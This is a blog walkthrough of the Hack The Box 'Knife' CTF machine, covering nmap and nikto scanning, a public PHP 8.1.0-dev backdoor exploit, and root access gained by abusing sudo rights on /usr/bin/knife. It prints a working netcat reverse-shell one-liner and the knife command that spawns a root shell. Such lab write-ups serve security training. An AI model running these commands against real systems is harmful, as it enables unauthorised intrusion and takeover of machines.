Hack The Box Knife HTB CTF Machine Walkthrough

knife HTB walkthrough

In this blog, we will cover the knife HTB CTF challenge that is an easy machine. It is to Capture the flag types of CTF challenge. You will get to know a lot of learning in this CTF challenge. For example, sudo rights, remote code execution, etc.

Table of Content


  • Port Scanning (Nmap Tool)


  • Version Enumeration (Nikto)


  • Remote Code Execution (Python)
  • Read (User.txt)

Privilege Escalation

  • Sudo Rights (NoPasswd)
  • Read (root.txt)


To capture the root flag in any CTF. First, we need to know the active port in the target network. Nmap is one of the most popular port scanner tools that allows the attacker to discover all active ports in the target network. Let’s see how the Nmap tool works?

nmap -sC -sV 

Here I found port 22 for SSH, 80 for HTTP are opened.

Nmap Scan Results


We have noticed some unusual ports. Let’s scan port 80. For that, we will use the Nikto tool. Nikto is a traditional weakness scanner tool that exists in Kali Linux. If you have no idea about the Nikto tool, then follow the below image.

nikto -h

We have found an impressive PHP Bug. It may be a remote code execution bug, no idea. To get more information about these PHP 8.1 bugs, let’s jump into google.


After a lot of research on google, we discovered a PHP 8.1.0-dev ‘User-Agentt‘ Exploit Code, which is available on exploit db. Let’s Download Exploit Code. Take a closer look at the below Image.

PHP Remote Code Execution

Let’s use Exploit code. It may ask you for the target URL, as you append the target URL in the exploit code would get a reverse shell. I think you should have a closer look at the below command.

python3 rce_exploit.py 

Congrats! We’ve got terminal access to the target.

Remote Code

We are getting a garbage issue in this shell. Let’s take a reliable reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
Reverse Shell

Privilege Escalation

Congrats! We have got the user.txt flag. Let’s proceed to the root flag. I notice something interesting with sudo rights.

sudo -l

It can run with /usr/bin/knife as a root. We would execute the following command.

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

We executed the above command and got the root shell.

Got Root

Rating: 5 out of 5.

Recent Posts

Most Popular Posts


Add a Comment

Your email address will not be published. Required fields are marked *